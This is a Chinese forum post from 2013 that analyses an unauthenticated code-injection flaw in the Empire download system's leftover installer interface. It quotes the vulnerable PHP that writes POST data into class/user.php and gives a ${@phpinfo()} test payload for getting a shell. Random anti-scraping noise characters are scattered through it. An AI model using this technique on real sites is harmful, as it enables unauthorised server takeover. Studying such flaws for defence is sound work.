这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
* U& ^& _$ P5 H+ F' n6 ]) z; q5 s: F8 ?/ |; k
4 ^4 L! \+ v6 k6 W O( u
这是帝国的一套下载系统 如图& K! c3 b: T6 I% |/ m9 O
ps(不需要任何账户和密码,直接写shell)
# [8 G3 r! q# E# j/ y: L' P, R由于很多站是由于下载要整合discuz 等等一些论坛....
7 d5 {6 j% m' N7 h7 @3 \0 L. [
! d ?7 Y; r; K: ] P8 X而帝国他又有一个万能接口,如图 ]' f# ]& O5 [: H. T6 ~
; D; _0 `2 u7 o4 M: G3 V8 g# ~0 O5 \1 w4 G2 a" q4 a+ G8 Z4 q! K& m
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码- f9 a2 n4 S% ]6 T4 B: a( ~6 o
0 v( _2 i, t* ^" T+ }" w当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
2 r( Y# f0 J4 @0 ]! Y' {0 f; G0 `( b! u, ~% n9 B2 b2 O
在data/fun.php中的15行6 z ~8 D2 n; R5 A, O
" `2 Q9 M ]7 q
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {3 ?) _. N& E/ N% G9 C, |
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干 g: K) b& M$ v" z& s: \; ? ]
: Y3 v; b0 C" m! f这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
, s7 { h& G; _) l9 n
% z1 M7 w. l. G4 C2 s# I他将传进来的变量进行了切割,然后赋给了$filetext
2 ?6 z, d, L8 h. k8 O; i5 N
* p4 \# Z! u# _1 O2 Y6 `然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
: \9 L$ N/ s/ X; s( j4 b7 ~+ M {/ Z! \3 E9 H& [
我们看看写入的结果,随便填一个
# a0 f" e+ b. x6 }
9 N6 Z; z( L H1 _" O- D" y' J( H2 v h" S& S
. h8 s+ t+ T# ?9 R A" k8 X
: S0 f" E9 C! K/ E+ P: V F/ G
2 H8 q! Z) r$ B* r, W b
" c# ?9 c8 o& l: C& z t9 y4 Y
- o; r! {6 e+ j) ]/ @1 Z
8 p1 D1 T9 g3 |6 E6 s$ i7 l* K0 h: j! v! p' c
, m5 W A* O! S& ]4 Z1 Z1 w$ U
& t( z: g v1 S# d2 c7 ?. K
# ]* }2 [, Z, k6 D7 p2 E+ C
. ]. \+ A' Z" H& K2 z" \3 n7 [* k j P* k" w T& z
+ ?; F# C% P5 \! H3 {, M b8 z0 Z+ ?% a
' L0 Z v7 W- W/ I& h
) F$ R! W X) e9 A: x# o) ?
`$ h3 @# Z5 P8 r2 r) x7 ]3 p4 l0 H( E/ M: d; G& q1 F& J
所以我们淫荡点,写个${@phpinfo()}试试 ; a: l- ?7 D7 }4 O& C; P
然后访问以下class/user.php这个文件
) [2 x4 D e. V, O0 b$ ]日了吧
: Z! {, i7 L* D# y3 H
' ^ q8 w) V$ `6 L$ L$ U! s
- M% [6 a: S8 n& F9 J) |# e$ K. C
! ?5 p3 k. D9 K$ K2 x
G/ d6 d+ R$ d7 S( o: p" y
" ]7 h5 X& U- y4 H) g) i, X; X; U | 
发表于 2013-1-23 09:34:37
收藏
支持
反对